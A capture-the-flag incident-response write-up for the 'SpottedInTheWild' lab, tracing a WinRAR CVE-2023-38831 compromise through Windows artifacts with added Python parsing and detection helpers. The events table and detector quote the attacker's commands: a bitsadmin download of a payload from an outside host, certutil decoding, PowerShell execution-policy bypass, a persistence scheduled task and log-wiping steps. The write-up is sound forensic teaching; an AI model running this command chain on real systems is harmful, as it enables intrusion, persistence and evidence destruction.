SpottedInTheWild Lab Writeup
==============================
# Scenario
You are part of the incident response team at FinTrust Bank. This morning, the network monitoring system flagged unusual outbound traffic patterns from several workstations. Preliminary analysis by the IT department has identified a potential compromise linked to an exploited vulnerability in WinRAR software.
As an incident responder, your task is to investigate this compromised workstation to understand the scope of the breach, identify the malware, and trace its activities within the network.
## [Lab](https://cyberdefenders.org/blueteam-ctf-challenges/spottedinthewild/) Link
# Solution
First, I am not going to treat the challenge as a Q & A; I will walk through the investigation and answer the questions at the end.
Let's mount the .vhd with Arsenal Image Mounter. You may ask why not FTK Imager: FTK Imager does not mount Volume Shadow Copies, so to stay on the safe side, use Arsenal Image Mounter.

So, how to start?
If you ask me, I go to my favorite artifact, the **Windows 10 Timeline** (on Win10 and above), to learn the attacker's activity on the system.
**Location:** `\AppData\Local\ConnectedDevicesPlatform\L.Administrator\ActivitiesCache.db`
When I went to that location, the .db file was missing. That's weird: this is not an ordinary attacker, as he knows this artifact and deleted it. But I saw that there is a VSS in our acquisition, so let's go to the same location inside it, and here is our file.

Tool: **WxTCmd** from Eric's tools (run with admin privileges).
```
WxTCmd.exe -f E:\VSS1\Users\Administrator\AppData\Local\ConnectedDevicesPlatform\L.Administrator\ActivitiesCache.db --csv C:\Users\20100\Desktop\chal\
```

Now we see that our pivot point is **Telegram**; when you go to the `Telegram Desktop` location, you will find the .rar file.
**Pretty cool.**
**Telegram execution, PowerShell execution, WinRAR, SANS SEC401.rar, cmd.**
We Will keep in mind the timeline as we will check it later.
Well, I will assume there was no **ActivitiesCache.db**, so I will go to the registry user activity (NTUSER.DAT) to see what the user did on our system.
So, I will load the NTUSER.DAT hive and make sure to also load its transaction logs (**ntuser.dat.LOG***).
We will check **RecentDocs**, then export it with the export button to open it in Excel.
**Location:**
`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`

- As we see, the Telegram Desktop folder was opened, indicating that the attacker downloaded the rar file from there; also the MRU position shows that SANS SEC401.rar was last opened at `07:34:16`, which is nearly the time from the **Win10 Timeline** artifact (3 seconds earlier).
That's good for now.
- Let's find out the attacker's execution activity on the system (UserAssist, Amcache, ShimCache, Prefetch, BAM/DAM).
# Program Execution Activity
**1- UserAssist** [GUI programs launched in Windows]
**Location:**
NTUSER.DAT\\Software\\Microsoft\\Windows\\Currentversion\\Explorer\\UserAssist\\{GUID}\\Count

- As usual, export it from the registry for easy analysis with Excel.


- It seems that PowerShell was last executed at 9:02:52 PM. Okay, everything will get clear when we build the super timeline, so don't worry.
**2- ShimCache**
**Location:**
`SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache\AppCompatCache`
- When I went to load the SYSTEM hive, it wasn't there, so just go to the VSC to get it.
- After checking it, it has no data for the time the attack happened. That makes sense, as ShimCache only contains executables that need compatibility shims for older software running on newer versions of Windows, or that were visible in Windows Explorer while the user was interacting with Windows, and that indicates the attacker didn't run any malicious exe file at any time during the attack.
**3- Amcache**
**Location:**
`\Windows\AppCompat\Programs\Amcache.hve`
- It is deleted, so, as with any deleted item, you will find it in the VSC. Load it with its transaction logs and parse it with AmcacheParser.
Oops, nothing there.
**4- BAM** (Background Activity Moderator)
**Location:**
`SYSTEM\CurrentControlSet\Services\bam\UserSettings\S-1-5-21-3703689867-555221776-1578950957-500`

- Telegram ran on 2/2/2024 6:30:18 PM, which matches the time Telegram ran according to the Win10 Timeline.
- Cmd.exe ran on 2/3/2024 9:04:03 PM.
**5- Prefetch**
- Date/time the .exe was first executed = creation date of the .pf file (~-10 seconds)
- Date/time the .exe was last executed = last modification date of the .pf file (~-10 seconds) = last execution time also embedded in the .pf file
**Location:**
`\Windows\prefetch`
- I went to `C\Windows\prefetch`, where there were 241 items, and to `\VSS1\Windows\prefetch`, where there were 29 items, so I will parse both of them so that I don't miss anything. [Don't try to copy one folder into the other.]
- I will parse them with PECmd.exe from Eric's tools.
```
PECmd.exe -d 'E:\C\Windows\prefetch\' --csv C:\Users\20100\Desktop\chal\Prefetch\
```

So, just keep in mind that the real execution time is about 10 seconds before the created and modified times.
As you see, there are many executions in a consecutive sequence, as we saw in the Win10 Timeline artifact.
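Since we parse both prefetch folders and then apply the 10-second adjustment by hand, here is an added example (my code, not part of the writeup or of PECmd) that merges the two PECmd CSV exports, keys them on executable and hash, keeps every run time seen in either copy, and produces the execution sequence for the attack window with the ~10 s lag subtracted from the .pf creation time. The CSV rows are constructed to resemble the lab's sequence, and the column names (ExecutableName, Hash, RunCount, SourceCreated, SourceModified, LastRun) are assumed to match PECmd's `--csv` output.

```python
"""Merge PECmd CSV exports from the live volume and the shadow copy into one
execution timeline with the ~10 s prefetch lag removed (added example, not
from the original writeup or from PECmd).

Assumed: the column names match PECmd's --csv output. The rows below are
constructed to resemble the lab's sequence; they are not the lab's data.
"""
import csv
import io
from datetime import datetime, timedelta

PF_LAG = timedelta(seconds=10)  # .pf timestamps trail the real start by ~10 s

# Constructed export of E:\C\Windows\prefetch (live volume). Note that CMD.EXE's
# LastRun is its 9:04:03 PM run, so its 07:34 run only survives in the VSC copy.
LIVE_CSV = """\
ExecutableName,Hash,RunCount,SourceCreated,SourceModified,LastRun
WINRAR.EXE,3A1B2C4D,2,2024-02-03 07:34:26.0000000,2024-02-03 07:34:26.0000000,2024-02-03 07:34:16.0000000
CMD.EXE,9F8E7D6C,5,2024-02-01 10:00:30.0000000,2024-02-03 21:04:13.0000000,2024-02-03 21:04:03.0000000
BITSADMIN.EXE,11223344,1,2024-02-03 07:34:33.0000000,2024-02-03 07:34:33.0000000,2024-02-03 07:34:23.0000000
CERTUTIL.EXE,55667788,1,2024-02-03 07:34:36.0000000,2024-02-03 07:34:36.0000000,2024-02-03 07:34:26.0000000
SCHTASKS.EXE,AABBCCDD,1,2024-02-03 07:34:50.0000000,2024-02-03 07:34:50.0000000,2024-02-03 07:34:40.0000000
"""
# Constructed export of E:\VSS1\Windows\prefetch (older snapshot: fewer files,
# a lower run count for cmd, and one .pf that no longer exists on the live volume).
VSS_CSV = """\
ExecutableName,Hash,RunCount,SourceCreated,SourceModified,LastRun
CMD.EXE,9F8E7D6C,4,2024-02-01 10:00:30.0000000,2024-02-03 07:34:29.0000000,2024-02-03 07:34:19.0000000
POWERSHELL.EXE,0DEADBEE,1,2024-02-03 07:34:40.0000000,2024-02-03 07:34:40.0000000,2024-02-03 07:34:30.0000000
"""


def _parse_ts(value):
    """PECmd timestamps look like 'YYYY-MM-DD HH:MM:SS.fffffff'; keep microseconds."""
    base, _, frac = value.partition(".")
    dt = datetime.strptime(base, "%Y-%m-%d %H:%M:%S")
    return dt.replace(microsecond=int((frac + "000000")[:6])) if frac else dt


def parse_pecmd_csv(text, source):
    """Read one PECmd CSV export; `source` tags which volume the rows came from."""
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        rows.append({
            "exe": r["ExecutableName"].upper(),
            "hash": r["Hash"].upper(),
            "run_count": int(r["RunCount"]),
            "pf_created": _parse_ts(r["SourceCreated"]),
            "pf_modified": _parse_ts(r["SourceModified"]),
            "runs": {(_parse_ts(r["LastRun"]), source)},
        })
    return rows


def merge_prefetch(*row_sets):
    """Combine exports keyed on (exe, hash): keep the highest run count, the
    earliest .pf creation, and the union of every LastRun seen in any copy."""
    merged = {}
    for rows in row_sets:
        for r in rows:
            key = (r["exe"], r["hash"])
            if key in merged:
                m = merged[key]
                m["run_count"] = max(m["run_count"], r["run_count"])
                m["pf_created"] = min(m["pf_created"], r["pf_created"])
                m["pf_modified"] = max(m["pf_modified"], r["pf_modified"])
                m["runs"] |= r["runs"]
            else:
                merged[key] = dict(r, runs=set(r["runs"]))
    return list(merged.values())


def execution_timeline(rows, start, end):
    """Every recorded execution inside [start, end], oldest first, with the
    estimated first execution (= .pf creation minus the lag) alongside."""
    events = []
    for r in rows:
        for when, source in r["runs"]:
            if start <= when <= end:
                events.append({"exe": r["exe"], "run": when, "source": source,
                               "first_run_est": r["pf_created"] - PF_LAG,
                               "run_count": r["run_count"]})
    return sorted(events, key=lambda e: e["run"])


ATTACK_WINDOW = (datetime(2024, 2, 3, 7, 34, 0), datetime(2024, 2, 3, 7, 35, 0))


def demo_timeline():
    merged = merge_prefetch(parse_pecmd_csv(LIVE_CSV, "C"), parse_pecmd_csv(VSS_CSV, "VSS1"))
    return execution_timeline(merged, *ATTACK_WINDOW)


if __name__ == "__main__":
    for e in demo_timeline():
        print(f"{e['run']}  {e['exe']:<15} from {e['source']:<5} "
              f"first seen ~{e['first_run_est']}  runs={e['run_count']}")
```

Merging on the union of run times rather than "newest row wins" is the point: the live CMD.EXE.pf only reports the 9:04 PM run, and the 07:34:19 execution inside the attack window would vanish from the timeline if the VSC export were discarded.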
**Lastly, before going to the logs**, I will look at shell items to make sure that every single step we took is right.
**Shell Items** [Shortcut files (.lnk), Jumplists, ShellBags]
**1- LNK Files**
1. The creation date of the .lnk file is the first time a file with that exact name was opened, regardless of location.
2. The last modification date of the .lnk file is the last time a file with that exact name was opened, regardless of location.
**Location:**
`C:\Users\<User>\AppData\Roaming\Microsoft\Windows\Recent`
Use LECmd on the two LNK files that exist: the target file and the parent directory of the target file.
```
LECmd.exe -f "E:\C\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\SANS SEC401.rar.lnk"
```


**2- Jumplists**
There are two folders for this artifact:
- AutomaticDestinations (contain information about recently accessed applications and files)
- CustomDestinations (created with specific information from the application developer)

```
JLECmd.exe -d E:\C\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\ --csv C:\Users\20100\Desktop\chal\jumplists
```
1. The entry's last modification time is when the entry was added to the jump list.
2. Target creation time = first time the item was added to the AppID file = first execution of the application with the file open.
3. Target modification time = last time the item was added to the AppID file = last execution of the application with the file open.

**3- ShellBags**
- Information is available only for folders that have been opened and closed in Windows Explorer at least once.
- To get all ShellBags information, we need to parse both NTUSER.dat (Desktop) and USRCLASS.dat (Explorer) for each user account.
- We will use ShellBags Explorer from Eric's tools.
- After loading the hives, we can export the data as an Excel file for better analysis.

Now we have mapped all the attacker's activities on the system. Don't worry, everything will be clear when we explore the final timeline, so let's find out what happened after the attacker downloaded the .rar file.
### Tasks
- We saw in prefetch that SCHTASKS.EXE ran at 07:34:40, shortly after the .rar file was opened, so let's go to the **SOFTWARE** registry hive to see the tasks.
**Location:**
`SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks`
- After exporting the entries and checking the time `07:34:40`, we see that **whoisthebaba** was created at that time.

So, the overall timeline till now is:

# **SANS SEC401.rar** Malicious File
- I moved it to my isolated machine to see what happens.

- The `SANS SEC401.pdf` file is actually a cmd file. After finding the WinRAR version [5.3 beta], we search for the CVE to identify it.

`CVE-2023-38831` -- PoC is [here](https://github.com/HDCE-inc/CVE-2023-38831).
- `SANS SEC401.pdf` uses `conhost.exe` to execute bitsadmin.exe, which downloads `amanwhogetsnorest.jpg` and puts it in `C:\Windows\Temp\`.
- When you go to the jpg location, you will not find it; the attacker deleted it. That takes us to parsing the $MFT, $LogFile and $J ($UsnJrnl) files.
### 1- $MFT
- The MFT keeps track of all files on the volume.
**Location:**
`C:\$MFT`
**Tools:**
MFTECmd.exe
```
MFTECmd.exe -f 'E:\C\$MFT' --csv C:\Users\20100\Desktop\chal\MFT&LogFile\
```
- I filtered by time and by some extensions to narrow my scope.

- When I looked at `amanwhogetsnorest.jpg`, the time it was created on the system was weird, as it was before the `BITSADMIN.EXE` run time. Maybe the attacker ran the script twice, deleted the file, and ran it again, but the name of the file was first recorded by the MFT at that time, so maybe the MFT did not record the second creation time, or something else happened; I actually don't know. But the MFT changed the last record time to `07:34:37`, which matches the scenario.

- So I went to check the file using the filesystem journal, and I tracked the file with its `Entry Number = 107251`. I found that the file started downloading at `07:34:23` and finished at `07:34:40`, which matches the context.

- Then we noticed there are some files after that time [normal.zip, EventLog.ps1, z.ps1, run.ps1, run.bat].
- `amanwhogetsnorest.jpg` dropped EventLog.ps1, run.bat, run.ps1.
- So, why only those three files?
- When I checked the locations of `run.ps1` and `run.bat`, I found them on the system; EventLog.ps1's job is tampering with the event logs (when we go to check them in the coming section, we will notice that many events are missing). `normal.zip` and `z.ps1` are not on the system, and when we parse $LogFile we will see that they were deleted.
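To show the entry-number tracking through $J and the time-and-extension filter on $MFT in code, here is an added example (mine, not from the writeup and not MFTECmd's code). The $J and $MFT records are constructed to mirror the case above (entry 107251, download between 07:34:23 and 07:34:40, plus a constructed deletion record), and the column names follow what I assume MFTECmd's CSVs look like, with the $J reasons kept as the raw USN_REASON_* bitmask.

```python
"""Track a file through $UsnJrnl:$J by MFT entry number and narrow an $MFT
listing to the attack window (added example, not from the original writeup).

Assumptions: records are dicts shaped like MFTECmd's CSV columns
(EntryNumber, Name, UpdateTimestamp, UpdateReasons for $J; EntryNumber,
FileName, Extension, Created0x10, LastModified0x10 for $MFT), with the $J
reasons as the raw USN_REASON_* bitmask. All records are constructed to
mirror the writeup's case; they are not parsed from the lab image.
"""
from datetime import datetime

# USN_REASON_* flags (winioctl.h). Reasons accumulate until the CLOSE record.
USN_REASONS = {
    0x00000001: "DATA_OVERWRITE",
    0x00000002: "DATA_EXTEND",
    0x00000004: "DATA_TRUNCATION",
    0x00000100: "FILE_CREATE",
    0x00000200: "FILE_DELETE",
    0x00001000: "RENAME_OLD_NAME",
    0x00002000: "RENAME_NEW_NAME",
    0x80000000: "CLOSE",
}
DATA_EXTEND, FILE_CREATE, FILE_DELETE, CLOSE = 0x2, 0x100, 0x200, 0x80000000


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def decode_reasons(flags):
    """Expand a USN reason bitmask into names, lowest bit first."""
    return [name for bit, name in sorted(USN_REASONS.items()) if flags & bit]


def file_lifecycle(j_records, entry_number):
    """Create / last-write / delete times for one MFT entry, or None if unseen."""
    recs = sorted((r for r in j_records if r["EntryNumber"] == entry_number),
                  key=lambda r: _ts(r["UpdateTimestamp"]))
    if not recs:
        return None

    def first(mask):
        return next((_ts(r["UpdateTimestamp"]) for r in recs if r["UpdateReasons"] & mask), None)

    writes = [_ts(r["UpdateTimestamp"]) for r in recs if r["UpdateReasons"] & DATA_EXTEND]
    return {
        "name": recs[-1]["Name"],
        "created": first(FILE_CREATE),
        "last_write": writes[-1] if writes else None,
        "deleted": first(FILE_DELETE),
        "record_count": len(recs),
    }


def filter_mft(mft_rows, start, end, extensions):
    """$MFT rows created or modified inside [start, end] with a watched extension."""
    wanted = {e.lower().lstrip(".") for e in extensions}
    hits = [r for r in mft_rows
            if r["Extension"].lower().lstrip(".") in wanted
            and any(start <= _ts(r[c]) <= end for c in ("Created0x10", "LastModified0x10"))]
    return sorted(hits, key=lambda r: _ts(r["Created0x10"]))


def _j(entry, name, when, reasons):
    return {"EntryNumber": entry, "Name": name, "UpdateTimestamp": when, "UpdateReasons": reasons}


# Constructed $J records: the download opens, grows, closes, then is deleted.
J_RECORDS = [
    _j(107251, "amanwhogetsnorest.jpg", "2024-02-03 07:34:23", FILE_CREATE),
    _j(107251, "amanwhogetsnorest.jpg", "2024-02-03 07:34:29", FILE_CREATE | DATA_EXTEND),
    _j(107251, "amanwhogetsnorest.jpg", "2024-02-03 07:34:40", FILE_CREATE | DATA_EXTEND | CLOSE),
    _j(107251, "amanwhogetsnorest.jpg", "2024-02-03 07:34:46", FILE_DELETE | CLOSE),
    _j(107260, "normal.zip", "2024-02-03 07:34:41", FILE_CREATE | DATA_EXTEND | CLOSE),
]


def _m(entry, name, ext, created, modified):
    return {"EntryNumber": entry, "FileName": name, "Extension": ext,
            "Created0x10": created, "LastModified0x10": modified}


# Constructed $MFT rows: three attack files plus two that the filter must drop.
MFT_ROWS = [
    _m(107251, "amanwhogetsnorest.jpg", ".jpg", "2024-02-03 07:34:23", "2024-02-03 07:34:40"),
    _m(107260, "normal.zip", ".zip", "2024-02-03 07:34:41", "2024-02-03 07:34:41"),
    _m(107262, "run.ps1", ".ps1", "2024-02-03 07:34:42", "2024-02-03 07:34:42"),
    _m(50010, "desktop.ini", ".ini", "2024-02-03 07:34:30", "2024-02-03 07:34:30"),
    _m(60020, "old.ps1", ".ps1", "2023-12-01 09:00:00", "2023-12-01 09:00:00"),
]
ATTACK_WINDOW = (_ts("2024-02-03 07:34:00"), _ts("2024-02-03 07:40:00"))


def demo():
    """Lifecycle of entry 107251 and the filtered $MFT listing for the window."""
    return (file_lifecycle(J_RECORDS, 107251),
            filter_mft(MFT_ROWS, *ATTACK_WINDOW, ("jpg", "zip", "ps1", "bat")))


if __name__ == "__main__":
    lifecycle, hits = demo()
    print(lifecycle)
    for row in hits:
        print(row["EntryNumber"], row["FileName"], row["Created0x10"])
```

Keying on the entry number rather than the file name is what makes the $J walk reliable: the name can be reused or renamed, while the entry (with its sequence number) identifies the record the bytes were written to.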
### 2- $LogFile
- Provides information based on the actions performed by users and the system (deletion, creation, renaming, ...).
**Location:**
`C:\$LogFile`
**Tools:**
NTFS Log Tracker
- You can search for how to use it.
- We need to know what happened to the `EventLog.ps1` and `amanwhogetsnorest.jpg` files, as we can't find them on the system.
- When I searched for the jpg file, $LogFile didn't track its deletion, but it does track the `EventLog.ps1` deletion at `2024-02-03 07:38:01`, which we assume happened after the script was run by PowerShell.
- After running the malicious file `SANS SEC401.pdf` on our isolated machine, everything is clear now: `z.ps1` is used for unzipping any zip file under `\windows\temp\`, and `run.ps1` is used for reconnaissance.

| Events in sequence |
|:--- |
| 1. Download `amanwhogetsnorest.jpg` |
| `bitsadmin /transfer Nothing /download /priority normal http://172.18.35.10:8000/amanwhogetsnorest.jpg C:\Windows\Temp\amanwhogetsnorest.jpg` |
| 2. Use certutil to decode `amanwhogetsnorest.jpg` to `normal.zip`, which drops Eventlog.ps1, run.bat, run.ps1 |
| `certutil -decode amanwhogetsnorest.jpg normal.zip 1>nul` |
| 3. Open cmd to run z.ps1 from PowerShell |
| 4. Create the task \whoisthebaba |
| 5. Delete z.ps1 |
| `cmd /c "powershell -NOP -EP Bypass C:\Windows\Temp\z.ps1"` |
| 6. Delete `amanwhogetsnorest.jpg` |
| `del amanwhogetsnorest.jpg` |
| 7. Delete `normal.zip` |
| `del normal.zip` |
| 8. Create task `\whoisthebaba`, which runs `run.bat` |
| `schtasks /create /sc minute /mo 3 /tn "whoisthebaba" /tr C:\Windows\Temp\run.bat /RL HIGHEST` |
| 9. Open cmd to run `Eventlog.ps1` from PowerShell |
| `cmd /c "powershell -NOP -EP Bypass C:\Windows\Temp\Eventlog.ps1"` |
| 10. Delete `Eventlog.ps1` |
| `del Eventlog.ps1` |
- I will stop the analysis at this point, as we now know nearly everything: the malicious dropper is `SANS SEC401.pdf`, and `amanwhogetsnorest.jpg` decodes to `normal.zip`, which contains malicious PowerShell scripts:
1. `run.ps1`: does reconnaissance of active hosts; you will also find it in the GitHub repo.

2. `run.bat`: the task action responsible for running `run.ps1`.
3. `Eventlog.ps1`: cleared the logs.
- I think there is no need to check the event logs, as `Eventlog.ps1` must have tampered with these events, so we won't get a lot of data from them.
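From a detection standpoint, the sequence in the table is a chain of LOLBin command lines that process-creation telemetry would record even after the event logs were cleared on the host. Here is an added example (my code, not from the writeup) that runs one simple rule per step over constructed process-creation events shaped like Sysmon Event ID 1 / Security 4688 fields (Image, ParentImage, CommandLine); the events, including the benign look-alikes used to check for false positives and the placeholder path in the first event, are constructed and are not log lines from the lab image.

```python
"""Flag each step of the LOLBin chain in process-creation telemetry
(added example, not from the original writeup).

The events are constructed records shaped like Sysmon Event ID 1 /
Security 4688 fields (Image, ParentImage, CommandLine); the field names,
the placeholder path and the benign control events are assumptions.
"""
import re

# One command-line rule per step of the observed chain (case-insensitive).
COMMAND_RULES = [
    ("bitsadmin_url_download",
     re.compile(r"\bbitsadmin(\.exe)?\b.*\s/transfer\b.*\bhttps?://", re.I)),
    ("certutil_decode",
     re.compile(r"\bcertutil(\.exe)?\b.*\s-decode\b", re.I)),
    ("powershell_bypass_temp_script",
     re.compile(r"\bpowershell(\.exe)?\b.*-(ep|executionpolicy)\s+bypass\b.*\\windows\\temp\\\S+\.ps1", re.I)),
    ("schtasks_highest_temp_action",
     re.compile(r"\bschtasks(\.exe)?\b.*\s/create\b.*\\windows\\temp\\.*\s/rl\s+highest\b", re.I)),
]
SHELLS = ("cmd.exe", "conhost.exe", "powershell.exe")


def match_event(event):
    """Return the names of every rule one process-creation event triggers."""
    hits = []
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    # An archive viewer spawning a shell is the CVE-2023-38831 entry point.
    if parent.endswith("\\winrar.exe") and image.endswith(SHELLS):
        hits.append("archiver_spawned_shell")
    command_line = event.get("CommandLine", "")
    hits.extend(name for name, rx in COMMAND_RULES if rx.search(command_line))
    return hits


def detect(events):
    """Rule hits per event, in input order."""
    return [match_event(e) for e in events]


def chain_rules_fired(events):
    """Distinct rules fired across the events; several together indicate the chain."""
    return sorted({name for hits in detect(events) for name in hits})


CMD = r"C:\Windows\System32\cmd.exe"

# Constructed events: the chain from the writeup, then benign look-alikes.
EVENTS = [
    {"ParentImage": r"C:\Program Files\WinRAR\WinRAR.exe", "Image": CMD,
     "CommandLine": r'cmd /c "<extracted-path-placeholder>\SANS SEC401.pdf"'},
    {"ParentImage": CMD, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer Nothing /download /priority normal "
                    r"http://172.18.35.10:8000/amanwhogetsnorest.jpg C:\Windows\Temp\amanwhogetsnorest.jpg"},
    {"ParentImage": CMD, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -decode amanwhogetsnorest.jpg normal.zip 1>nul"},
    {"ParentImage": CMD, "Image": CMD,
     "CommandLine": r'cmd /c "powershell -NOP -EP Bypass C:\Windows\Temp\z.ps1"'},
    {"ParentImage": CMD, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 3 /tn "whoisthebaba" /tr C:\Windows\Temp\run.bat /RL HIGHEST'},
    {"ParentImage": CMD, "Image": CMD,
     "CommandLine": r'cmd /c "powershell -NOP -EP Bypass C:\Windows\Temp\Eventlog.ps1"'},
    # Benign controls: same binaries, none of the flagged behaviour.
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -hashfile C:\Users\Administrator\Downloads\setup.msi SHA256"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoProfile -Command Get-Process"},
    {"ParentImage": CMD, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks /query /fo LIST"},
]

if __name__ == "__main__":
    for event, hits in zip(EVENTS, detect(EVENTS)):
        print(f"{hits or ['-']}  {event['CommandLine'][:70]}")
    print("chain rules fired:", chain_rules_fired(EVENTS))
```

Each rule alone is noisy enough to tune per environment; the useful signal is several of them firing on one host within a minute, which is exactly what the prefetch sequence above reconstructs after the fact.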
#### TimeLine Files will be [here](https://github.com/M4shl3/Home)
#### I don't need to write the answers, as they should now be clear to you :exploding_head:.
#### Also, I wrote this blog 8 months ago; I am sure there should be more in it, but I deleted the images and feel too lazy to reprocess everything again.